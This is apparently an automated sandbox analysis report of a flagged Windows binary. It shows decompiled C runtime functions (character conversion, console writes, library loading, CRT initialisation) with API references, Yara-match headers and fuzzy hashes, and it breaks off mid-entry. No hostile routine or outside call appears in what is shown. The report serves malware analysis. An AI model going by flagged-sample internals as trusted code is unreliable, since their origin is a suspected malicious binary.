            0x004078d6
            0x004078dd
            0x004078e2
            0x004078e8
            0x004078ee
            0x004078f4
            0x004078f7
            0x004078f7
            0x004078fa
            0x004078fc
            0x004078fc
            0x004078fa
            0x004078fe
            0x00407903
            0x0040790a
            0x0040790d
            0x0040790d
            0x00407929
            0x0040792f
            0x00407934
            0x00407ac7
            0x00407ad2
            0x00407ada
            0x0040793a
            0x0040793a
            0x0040793d
            0x00407942
            0x00407946
            0x0040799a
            0x0040799a
            0x0040799c
            0x0040799e
            0x00407abc
            0x00407abc
            0x00407abe
            0x00407abf
            0x00407ac5
            0x00000000
            0x00407ac5
            0x004079af
            0x004079b5
            0x004079b7
            0x00000000
            0x00000000
            0x004079bd
            0x004079cf
            0x004079d4
            0x004079d8
            0x00000000
            0x00000000
            0x004079e5
            0x00407a1f
            0x00407a22
            0x00407a25
            0x00407a27
            0x00407a29
            0x00407a2b
            0x00407a77
            0x00407a77
            0x00407a79
            0x00407a79
            0x00407a7b
            0x00407ab5
            0x00407ab6
            0x00000000
            0x00407abb
            0x00407a8f
            0x00407a94
            0x00407a96
            0x00000000
            0x00000000
            0x00407a9a
            0x00407a9b
            0x00407a9c
            0x00407a9f
            0x00407adb
            0x00407ade
            0x00407aa1
            0x00407aa1
            0x00407aa2
            0x00407aa2
            0x00407aaf
            0x00407ab1
            0x00407ab3
            0x00407ae4
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00407ab3
            0x00407a2d
            0x00407a30
            0x00407a32
            0x00407a34
            0x00407a36
            0x00407a39
            0x00407a3e
            0x00407a59
            0x00407a5b
            0x00407a65
            0x00407a67
            0x00407a68
            0x00407a6a
            0x00000000
            0x00000000
            0x00407a6c
            0x00407a72
            0x00407a72
            0x00000000
            0x00407a72
            0x00407a40
            0x00407a42
            0x00407a46
            0x00407a4b
            0x00407a4d
            0x00407a4f
            0x00000000
            0x00000000
            0x00407a51
            0x00000000
            0x00407a51
            0x004079e7
            0x004079ec
            0x00000000
            0x00000000
            0x004079f2
            0x004079f4
            0x00000000
            0x00000000
            0x00407a10
            0x00407a14
            0x00000000
            0x00000000
            0x00000000
            0x00407a1a
            0x0040794d
            0x0040794f
            0x00407951
            0x00407959
            0x00407978
            0x0040797a
            0x00407984
            0x00407986
            0x00407987
            0x00407989
            0x00000000
            0x00000000
            0x0040798f
            0x00407995
            0x00407995
            0x00000000
            0x00407995
            0x0040795d
            0x00407961
            0x00407966
            0x0040796a
            0x00000000
            0x00000000
            0x00407970
            0x00000000
            0x00407970

            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
            • __alloca_probe_16.LIBCMT ref: 00407961
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
            • __alloca_probe_16.LIBCMT ref: 00407A46
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
            • __freea.LIBCMT ref: 00407AB6
              • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            • __freea.LIBCMT ref: 00407ABF
            • __freea.LIBCMT ref: 00407AE4
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
            • String ID:
            • API String ID: 3864826663-0
            • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
            • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
            • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
            • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
            Download Yara Rule
            C-Code - Quality: 72%
            			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0xf8d2dd75
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































            0x0040822b
            0x00408232
            0x00408235
            0x0040823d
            0x00408241
            0x0040824d
            0x00408250
            0x00408253
            0x0040825a
            0x00408262
            0x00408265
            0x0040826b
            0x00408271
            0x00408276
            0x00408278
            0x0040827b
            0x00408280
            0x0040828a
            0x00408291
            0x00408294
            0x0040829b
            0x004082a2
            0x004082ce
            0x004082f4
            0x004082f6
            0x00000000
            0x004082d0
            0x004082d3
            0x0040839a
            0x004083a6
            0x004083b1
            0x004083b6
            0x004082d9
            0x004082e0
            0x004082e5
            0x004082eb
            0x004082f1
            0x00000000
            0x004082f1
            0x004082eb
            0x004082d3
            0x004082a4
            0x004082a8
            0x004082ab
            0x004082b1
            0x004082b3
            0x004082b6
            0x004082ba
            0x004082f7
            0x004082fa
            0x004082fb
            0x00408300
            0x00408306
            0x0040830c
            0x0040831b
            0x00408321
            0x00408327
            0x0040832c
            0x00408348
            0x004083bb
            0x004083c1
            0x0040834a
            0x00408352
            0x0040835b
            0x00408361
            0x00000000
            0x00408363
            0x00408365
            0x00408368
            0x00408381
            0x00000000
            0x00408383
            0x00408387
            0x00408389
            0x0040838c
            0x00000000
            0x0040838c
            0x00408387
            0x00408381
            0x00408361
            0x0040835b
            0x00408348
            0x0040832c
            0x00408306
            0x00000000
            0x0040838f
            0x0040838f
            0x004083c3
            0x004083cd
            0x004083d5

            APIs
            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
            • __fassign.LIBCMT ref: 004082E0
            • __fassign.LIBCMT ref: 004082FB
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
            • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
            • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID:
            • API String ID: 1324828854-0
            • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
            • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 27%
            			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0xf8d2dd75
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









            0x00403639
            0x00403640
            0x00403643
            0x00403647
            0x00403652
            0x0040365a
            0x00403665
            0x0040366b
            0x0040366f
            0x00403676
            0x0040367c
            0x0040367c
            0x0040367e
            0x00403683
            0x00403688
            0x00403688
            0x00403693
            0x0040369b

            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
            • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
            • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
            Download Yara Rule
            C-Code - Quality: 79%
            			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0xf8d2dd75
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























            0x004062c0
            0x004062c7
            0x004062ca
            0x004062d3
            0x004062d8
            0x004062dd
            0x004062e2
            0x004062e5
            0x004062e7
            0x004062e7
            0x004062ec
            0x00406305
            0x0040630b
            0x00406310
            0x004063af
            0x004063b3
            0x004063b8
            0x004063b8
            0x004063cc
            0x004063d4
            0x004063d4
            0x00406316
            0x00406319
            0x0040631e
            0x00406322
            0x0040636e
            0x00406370
            0x00406372
            0x00406377
            0x0040638e
            0x00406396
            0x004063a6
            0x004063a6
            0x00406396
            0x004063a8
            0x004063a9
            0x00000000
            0x004063ae
            0x00406324
            0x00406329
            0x0040632b
            0x0040632d
            0x0040632d
            0x00406335
            0x00406352
            0x0040635c
            0x00406361
            0x00000000
            0x00000000
            0x00406363
            0x00406369
            0x00406369
            0x00000000
            0x00406369
            0x00406339
            0x0040633d
            0x00406342
            0x00406346
            0x00000000
            0x00000000
            0x00406348
            0x00000000

            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
            • __alloca_probe_16.LIBCMT ref: 0040633D
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
            • __freea.LIBCMT ref: 004063A9
              • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
            • String ID:
            • API String ID: 313313983-0
            • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
            • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
            • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
            • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00409BDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00409BDD(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00405D6E(_t33) != 0xffffffff) {
					_t13 =  *0x4130a0; // 0x577d30
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00405D6E(2);
						if(E00405D6E(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E00405D6E(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00405CDD(_t33);
						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E004047FB(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}







            0x00409be4
            0x00409bf1
            0x00409bf7
            0x00409bff
            0x00409c0d
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00409c15
            0x00409c15
            0x00409c17
            0x00409c29
            0x00000000
            0x00000000
            0x00409c2b
            0x00409c3b
            0x00000000
            0x00000000
            0x00409c43
            0x00409c45
            0x00409c46
            0x00409c5e
            0x00409c65
            0x00000000
            0x00409c73
            0x00000000
            0x00409c6e
            0x00409bff
            0x00409bf3
            0x00409bf3
            0x00000000

            APIs
            • CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
            • GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
            • __dosmaperr.LIBCMT ref: 00409C68
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CloseErrorHandleLast__dosmaperr
            • String ID: 0}W
            • API String ID: 2583163307-3031760750
            • Opcode ID: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
            • Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
            • Opcode Fuzzy Hash: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
            • Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xf8d2dd76
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










            0x00405756
            0x0040575a
            0x00405761
            0x00405765
            0x00405773
            0x00405789
            0x0040578d
            0x004057b6
            0x004057b8
            0x004057bc
            0x004057bf
            0x004057bf
            0x004057c5
            0x004057c7
            0x00000000
            0x004057c8
            0x0040578f
            0x00405798
            0x004057a7
            0x0040579a
            0x0040579d
            0x004057a3
            0x004057a3
            0x004057ab
            0x00000000
            0x004057ad
            0x004057b0
            0x004057b2
            0x00000000
            0x004057b2
            0x004057ab
            0x00405767
            0x0040576c
            0x00000000

            APIs
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
            • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
            • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
            Download Yara Rule
            C-Code - Quality: 71%
            			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















            0x00404320
            0x00404320
            0x00404320
            0x0040432a
            0x0040432c
            0x00404331
            0x00404334
            0x00404342
            0x00404349
            0x0040434e
            0x00404351
            0x00404354
            0x00404366
            0x0040436b
            0x0040436d
            0x00404378
            0x0040437f
            0x00404384
            0x00404387
            0x00404389
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040436f
            0x0040436f
            0x00000000
            0x0040436f
            0x00404356
            0x00404356
            0x00404357
            0x00404357
            0x0040435c
            0x00404397
            0x00404398
            0x0040439e
            0x004043a3
            0x004043a6
            0x004043a7
            0x004043a8
            0x004043af
            0x004043b1
            0x004043b3
            0x004043b8
            0x004043bb
            0x004043c9
            0x004043d5
            0x004043d8
            0x004043db
            0x004043ed
            0x004043f2
            0x004043f4
            0x004043ff
            0x00404405
            0x0040440d
            0x0040440f
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004043f6
            0x004043f6
            0x00000000
            0x004043f6
            0x004043dd
            0x004043dd
            0x004043de
            0x004043de
            0x00404411
            0x00404412
            0x00404412
            0x004043bd
            0x004043c3
            0x004043c7
            0x0040441a
            0x0040441b
            0x00404421
            0x00000000
            0x00000000
            0x00000000
            0x004043c7
            0x00404428
            0x00404428
            0x00404336
            0x0040433c
            0x00404340
            0x0040438b
            0x0040438c
            0x00404396
            0x00000000
            0x00000000
            0x00000000
            0x00404340

            APIs
            • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
            • _abort.LIBCMT ref: 0040439E
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: ErrorLast$_abort
            • String ID:
            • API String ID: 88804580-0
            • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
            • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
            • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
            • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





            0x004025ba
            0x004025bf
            0x004025cb
            0x004025d0
            0x004025d5
            0x004025d7
            0x004025e2
            0x004025d9
            0x004025d9
            0x00000000
            0x004025d9
            0x004025cd
            0x004025cd
            0x004025cf
            0x004025cf

            APIs
            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
              • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
            • String ID:
            • API String ID: 1761009282-0
            • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
